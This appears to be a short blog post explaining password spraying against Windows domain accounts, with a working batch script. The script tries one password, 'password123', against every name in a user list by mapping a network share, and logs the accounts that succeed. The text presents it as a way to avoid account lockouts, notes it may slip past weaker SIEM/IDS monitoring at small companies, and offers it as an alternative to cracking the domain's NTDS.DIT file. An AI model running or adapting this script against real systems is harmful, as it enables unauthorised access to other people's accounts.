Yes, it is possible to break into a user account using nothing but a bat file and a list of names.
Quite frequently sequentially failed login attempts result in an account lock for 15 minutes. This is an irritation as it means it cannot be brute forced… HOWEVER
Given a list of names and a singular password, we can try every single user name we have on file, and test it against one password. This will result in no account lockouts. It may however trip any SIEM/IDS/IPS, but for smaller companies this is likely to work a treat.
We simply need one file in the same location as the bat file named ‘userlist.txt’. The results file will be created automatically. Essentially all this script does is attempt to connect to a share I know that everyone should have access to. It attempts to map a drive under their name with the generic password of ‘password123’.
If the bat file detects that f:/ is successfully mapped, it will log the success in the results folder.
This attack is useful if you do not have access to the AD NTDS.DIT file for cracking in JTR.
@ECHO OFF if exist f:\ ( net use f: /delete ) echo Successes>results.txt echo ###########>>results.txt for /F "tokens=1" %%i in (userlist.txt) do call :process %%i goto thenextstep :process set VAR1=%1 net use f: \\127.0.0.1\testShare /USER:abyz\%1 password123 if exist f:\ ( echo %1>>results.txt net use f: /delete echo %1 ) goto :EOF
net use f: /delete